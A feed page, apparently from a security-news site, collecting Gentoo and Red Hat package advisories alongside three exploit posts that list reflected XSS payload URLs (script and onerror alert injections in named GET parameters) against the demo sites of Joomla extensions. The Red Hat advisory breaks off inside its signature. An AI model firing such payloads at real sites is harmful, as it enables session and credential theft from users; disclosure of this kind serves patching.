Gentoo Linux Security Advisory 202209-21 - A vulnerability has been discovered in Poppler which could allow for arbitrary code execution. Versions less than 22.09.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Poppler: Arbitrary Code Execution  
     Date: September 29, 2022  
     Bugs: #867958  
       ID: 202209-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in Poppler which could allow for  
arbitrary code execution.

Background  
=========  
Poppler is a PDF rendering library based on the xpdf-3.0 code base.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-text/poppler           < 22.09.0                  >= 22.09.0

Description  
==========  
Multiple vulnerabilities have been discovered in Poppler. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Processing a specially crafted PDF file or JBIG2 image could lead to a  
crash or the execution of arbitrary code.

Workaround  
=========  
Avoid opening untrusted PDFs.

Resolution  
=========  
All Poppler users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/poppler-22.09.0"

References  
=========  
[ 1 ] CVE-2021-30860  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30860  
[ 2 ] CVE-2022-38784  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38784

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-21

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-21

Gentoo Linux Security Advisory 202209-19 - Multiple vulnerabilities have been discovered in GraphicsMagick, the worst of which are fuzzing issues presumed to allow for arbitrary code execution. Versions less than 1.3.38 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: GraphicsMagick: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #721328, #836283, #873367  
       ID: 202209-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in GraphicsMagick, the  
worst of which are fuzzing issues presumed to allow for arbitrary code  
execution.

Background  
=========  
GraphicsMagick is a collection of tools and libraries which support  
reading, writing, and manipulating images in many major formats.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-gfx/graphicsmagick   < 1.3.38                    >= 1.3.38

Description  
==========  
Multiple vulnerabilities have been discovered in GraphicsMagick. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All GraphicsMagick users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/graphicsmagick-1.3.38"

References  
=========  
[ 1 ] CVE-2020-12672  
      https://nvd.nist.gov/vuln/detail/CVE-2020-12672  
[ 2 ] CVE-2022-1270  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1270

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-19

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-19

Joomla DJ-Classifieds Ads extension version 3.9 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                      [ Exploits ]                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : extensions.joomla.org                                                      │  
│  Vendor   : DJ-Extensions                                                              │  
│  Software : DJ-Classifieds Ads 3.9 Extension for Joomla - Reflected XSS                │  
│  Vuln Type: Reflected XSS                                                              │  
│  Method   : GET                                                                        │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2022                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

GET parameter 'start' is vulnerable to XSS

https://demo.dj-extensions.com/dj-classifieds-demo3/?start=6khflc"><img src=a onerror=alert(1)>hqr03

GET parameter 'task' is vulnerable to XSS

https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?task=parsesearchppbyq"><img src=a onerror=alert(1)>a8ex2

GET parameter 'se' is vulnerable to XSS

https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=ce3x1"><img src=a onerror=alert(1)>jlih5

GET parameter 'se_radius_unit' is vulnerable to XSS

https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=1&se_radius_unit=kmjqbjk"><img src=a onerror=alert(1)>cnrhh

GET parameter 'se_radius' is vulnerable to XSS

https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=1&se_radius_unit=km&se_radius=50k1yfg"><img src=a onerror=alert(1)>y1lp9

[-] Done

Joomla DJ-Classifieds Ads 3.9 Cross Site Scripting

jCart for OpenCart version 3.0.3.19 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : softPHP                                                                    ││  Software : jCart for OpenCart 3.0.3.19 - Reflected XSS                                ││             jCart is a standalone Joomla ecommerce component which includes OpenCart   ││             features                                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'Itemid' is vulnerable to XSShttp://demos.soft-php.com/jcart/index.php?option=com_jcart&Itemid=1091712';confirm(1)//274&route=product/search[-] Done

jCart For OpenCart 3.0.3.19 Cross Site Scripting

Gentoo Linux Security Advisory 202209-18 - Multiple vulnerabilities have been found in Mozilla Thunderbird, the world of which could result in arbitrary code execution. Versions less than 102.3.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #872572  
       ID: 202209-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Mozilla Thunderbird, the  
world of which could result in arbitrary code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  mail-client/thunderbird    < 102.3.0                  >= 102.3.0  
  2  mail-client/thunderbird-bin  < 102.3.0                >= 102.3.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-102.3.0"

All Mozilla Thunderbird binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-102.3.0"

References  
==========

[ 1 ] CVE-2022-3155  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3155  
[ 2 ] CVE-2022-40956  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40956  
[ 3 ] CVE-2022-40957  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40957  
[ 4 ] CVE-2022-40958  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40958  
[ 5 ] CVE-2022-40959  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40959  
[ 6 ] CVE-2022-40960  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40960  
[ 7 ] CVE-2022-40962  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40962

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-18

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-18

Gentoo Linux Security Advisory 202209-17 - Multiple vulnerabilities have been found in Redis, the worst of which could result in arbitrary code execution. Versions less than 7.0.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Redis: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #803302, #816282, #841404, #856040, #859181, #872278  
       ID: 202209-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Redis, the worst of which  
could result in arbitrary code execution.

Background  
==========

Redis is an open source (BSD licensed), in-memory data structure store,  
used as a database, cache and message broker.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-db/redis               < 7.0.5                      >= 7.0.5

Description  
===========

Multiple vulnerabilities have been discovered in Redis. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Redis users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-db/redis-7.0.5"

References  
==========

[ 1 ] CVE-2021-32626  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32626  
[ 2 ] CVE-2021-32627  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32627  
[ 3 ] CVE-2021-32628  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32628  
[ 4 ] CVE-2021-32672  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32672  
[ 5 ] CVE-2021-32675  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32675  
[ 6 ] CVE-2021-32687  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32687  
[ 7 ] CVE-2021-32761  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32761  
[ 8 ] CVE-2021-32762  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32762  
[ 9 ] CVE-2021-41099  
      https://nvd.nist.gov/vuln/detail/CVE-2021-41099  
[ 10 ] CVE-2022-24735  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24735  
[ 11 ] CVE-2022-24736  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24736  
[ 12 ] CVE-2022-31144  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31144  
[ 13 ] CVE-2022-33105  
      https://nvd.nist.gov/vuln/detail/CVE-2022-33105  
[ 14 ] CVE-2022-35951  
      https://nvd.nist.gov/vuln/detail/CVE-2022-35951

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-17

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-17

Gentoo Linux Security Advisory 202209-16 - Multiple vulnerabilities have been discovered in BlueZ, the worst of which could result in arbitrary code execution. Versions less than 5.63 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: BlueZ: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #797712, #835077  
       ID: 202209-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in BlueZ, the worst of  
which could result in arbitrary code execution.

Background  
==========

BlueZ is the canonical bluetooth tools and system daemons package for  
Linux.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-wireless/bluez         < 5.63                        >= 5.63

Description  
===========

Multiple vulnerabilities have been discovered in BlueZ. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All BlueZ users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-wireless/bluez-5.63"

References  
==========

[ 1 ] CVE-2020-26558  
      https://nvd.nist.gov/vuln/detail/CVE-2020-26558  
[ 2 ] CVE-2021-0129  
      https://nvd.nist.gov/vuln/detail/CVE-2021-0129  
[ 3 ] CVE-2021-3588  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3588  
[ 4 ] CVE-2022-0204  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0204

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-16

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-16

Joomla JoomRecipe extension version 4.2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomBoost                                                                  ││  Software : JoomRecipe 4.2.2 Extension for Joomla - Reflected XSS                      ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'withIngredients%5B%5D' is vulnerable to XSShttps://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&&withIngredients%5B%5D=hpf5w"><script>alert(1)</script>u7d68fi0pz1GET parameter 'withoutIngredients%5B%5D' is vulnerable to XSShttps://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&withoutIngredients%5B%5D=ucc8c"><script>alert(1)</script>lylajy83wro[-] Done

Joomla JoomRecipe 4.2.2 Cross Site Scripting

Red Hat Security Advisory 2022-6753-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include buffer overflow, denial of service, information leakage, null pointer, out of bounds read, out of bounds write, and server-side request forgery vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: httpd24-httpd security and bug fix update  
Advisory ID:       RHSA-2022:6753-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6753  
Issue date:        2022-09-29  
CVE Names:         CVE-2021-33193 CVE-2021-34798 CVE-2021-36160   
                   CVE-2021-39275 CVE-2021-44224 CVE-2022-22719   
                   CVE-2022-22721 CVE-2022-23943 CVE-2022-26377   
                   CVE-2022-28614 CVE-2022-28615 CVE-2022-29404   
                   CVE-2022-30522 CVE-2022-30556 CVE-2022-31813   
=====================================================================

1. Summary:

An update for httpd24-httpd is now available for Red Hat Software  
Collections.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64le, s390x, x86_64  
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)

* httpd: Request splitting via HTTP/2 method injection and mod_proxy  
(CVE-2021-33193)

* httpd: NULL pointer dereference via malformed requests (CVE-2021-34798)

* httpd: mod_proxy_uwsgi: out-of-bounds read via a crafted request uri-path  
(CVE-2021-36160)

* httpd: Out-of-bounds write in ap_escape_quotes() via malicious input  
(CVE-2021-39275)

* httpd: possible NULL dereference or SSRF in forward proxy configurations  
(CVE-2021-44224)

* httpd: mod_lua: Use of uninitialized value of in r:parsebody  
(CVE-2022-22719)

* httpd: core: Possible buffer overflow with very large or unlimited  
LimitXMLRequestBody (CVE-2022-22721)

* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)

* httpd: mod_lua: DoS in r:parsebody (CVE-2022-29404)

* httpd: mod_sed: DoS vulnerability (CVE-2022-30522)

* httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism  
(CVE-2022-31813)

* httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)

* httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)

* httpd: mod_lua: Information disclosure with websockets (CVE-2022-30556)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* proxy rewrite to unix socket fails with CVE-2021-40438 fix (BZ#2022319)

Additional changes:

* To fix CVE-2022-29404, the default value for the "LimitRequestBody"  
directive in the Apache HTTP Server has been changed from 0 (unlimited) to  
1 GiB.

On systems where the value of "LimitRequestBody" is not explicitly  
specified in an httpd configuration file, updating the httpd package sets  
"LimitRequestBody" to the default value of 1 GiB. As a consequence, if the  
total size of the HTTP request body exceeds this 1 GiB default limit, httpd  
returns the 413 Request Entity Too Large error code.

If the new default allowed size of an HTTP request message body is  
insufficient for your use case, update your httpd configuration files  
within the respective context (server, per-directory, per-file, or  
per-location) and set your preferred limit in bytes. For example, to set a  
new 2 GiB limit, use:

LimitRequestBody 2147483648

Systems already configured to use any explicit value for the  
"LimitRequestBody" directive are unaffected by this change.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

1966728 - CVE-2021-33193 httpd: Request splitting via HTTP/2 method injection and mod_proxy  
2005119 - CVE-2021-39275 httpd: Out-of-bounds write in ap_escape_quotes() via malicious input  
2005124 - CVE-2021-36160 httpd: mod_proxy_uwsgi: out-of-bounds read via a crafted request uri-path  
2005128 - CVE-2021-34798 httpd: NULL pointer dereference via malformed requests  
2034672 - CVE-2021-44224 httpd: possible NULL dereference or SSRF in forward proxy configurations  
2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds  
2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody  
2064322 - CVE-2022-22719 httpd: mod_lua: Use of uninitialized value of in r:parsebody  
2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling  
2095002 - CVE-2022-28614 httpd: out-of-bounds read via ap_rwrite()  
2095006 - CVE-2022-28615 httpd: out-of-bounds read in ap_strcmp_match()  
2095012 - CVE-2022-29404 httpd: mod_lua: DoS in r:parsebody  
2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability  
2095018 - CVE-2022-30556 httpd: mod_lua: Information disclosure with websockets  
2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism

6. Package List:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):

Source:  
httpd24-httpd-2.4.34-23.el7.5.src.rpm

noarch:  
httpd24-httpd-manual-2.4.34-23.el7.5.noarch.rpm

ppc64le:  
httpd24-httpd-2.4.34-23.el7.5.ppc64le.rpm  
httpd24-httpd-debuginfo-2.4.34-23.el7.5.ppc64le.rpm  
httpd24-httpd-devel-2.4.34-23.el7.5.ppc64le.rpm  
httpd24-httpd-tools-2.4.34-23.el7.5.ppc64le.rpm  
httpd24-mod_ldap-2.4.34-23.el7.5.ppc64le.rpm  
httpd24-mod_proxy_html-2.4.34-23.el7.5.ppc64le.rpm  
httpd24-mod_session-2.4.34-23.el7.5.ppc64le.rpm  
httpd24-mod_ssl-2.4.34-23.el7.5.ppc64le.rpm

s390x:  
httpd24-httpd-2.4.34-23.el7.5.s390x.rpm  
httpd24-httpd-debuginfo-2.4.34-23.el7.5.s390x.rpm  
httpd24-httpd-devel-2.4.34-23.el7.5.s390x.rpm  
httpd24-httpd-tools-2.4.34-23.el7.5.s390x.rpm  
httpd24-mod_ldap-2.4.34-23.el7.5.s390x.rpm  
httpd24-mod_proxy_html-2.4.34-23.el7.5.s390x.rpm  
httpd24-mod_session-2.4.34-23.el7.5.s390x.rpm  
httpd24-mod_ssl-2.4.34-23.el7.5.s390x.rpm

x86_64:  
httpd24-httpd-2.4.34-23.el7.5.x86_64.rpm  
httpd24-httpd-debuginfo-2.4.34-23.el7.5.x86_64.rpm  
httpd24-httpd-devel-2.4.34-23.el7.5.x86_64.rpm  
httpd24-httpd-tools-2.4.34-23.el7.5.x86_64.rpm  
httpd24-mod_ldap-2.4.34-23.el7.5.x86_64.rpm  
httpd24-mod_proxy_html-2.4.34-23.el7.5.x86_64.rpm  
httpd24-mod_session-2.4.34-23.el7.5.x86_64.rpm  
httpd24-mod_ssl-2.4.34-23.el7.5.x86_64.rpm

Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
httpd24-httpd-2.4.34-23.el7.5.src.rpm

noarch:  
httpd24-httpd-manual-2.4.34-23.el7.5.noarch.rpm

x86_64:  
httpd24-httpd-2.4.34-23.el7.5.x86_64.rpm  
httpd24-httpd-debuginfo-2.4.34-23.el7.5.x86_64.rpm  
httpd24-httpd-devel-2.4.34-23.el7.5.x86_64.rpm  
httpd24-httpd-tools-2.4.34-23.el7.5.x86_64.rpm  
httpd24-mod_ldap-2.4.34-23.el7.5.x86_64.rpm  
httpd24-mod_proxy_html-2.4.34-23.el7.5.x86_64.rpm  
httpd24-mod_session-2.4.34-23.el7.5.x86_64.rpm  
httpd24-mod_ssl-2.4.34-23.el7.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-33193  
https://access.redhat.com/security/cve/CVE-2021-34798  
https://access.redhat.com/security/cve/CVE-2021-36160  
https://access.redhat.com/security/cve/CVE-2021-39275  
https://access.redhat.com/security/cve/CVE-2021-44224  
https://access.redhat.com/security/cve/CVE-2022-22719  
https://access.redhat.com/security/cve/CVE-2022-22721  
https://access.redhat.com/security/cve/CVE-2022-23943  
https://access.redhat.com/security/cve/CVE-2022-26377  
https://access.redhat.com/security/cve/CVE-2022-28614  
https://access.redhat.com/security/cve/CVE-2022-28615  
https://access.redhat.com/security/cve/CVE-2022-29404  
https://access.redhat.com/security/cve/CVE-2022-30522  
https://access.redhat.com/security/cve/CVE-2022-30556  
https://access.redhat.com/security/cve/CVE-2022-31813  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/articles/6975397

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzXoqNzjgjWX9erEAQhSKA//d1V5w3Dbdd0R1QxlXMIweLpztJrkXpmN  
EY7WAFIMy0MG64KNjZFF5i4USpUlCm/tZX/fHZas4JjhZBqLxNSqsOdPeynDqp+8  
qZnnGiIhyO37S7x5v89VSaWngLpTi2f0d7RmJ05VJzAP8Q0a9cTqtIZiCsM18tTg  
BdoD1M/VWUhtPWCzgXiQVI8yF44IOenN2095OCv1Vxc3kiwQdbWcd7Uqz2TgVQ1m  
qeqh9AHqaDTwHVM9Ipj5oGp1Ue5zsyAEd77ClBCAzP3p7bWucfTErDrUSE3/hkDm  
H8BlPVPaOsRv0poFvvCODQhccC2bFc3uxoKzfSx+/WwkrU7vO/5/npmOfcwKfvBQ  
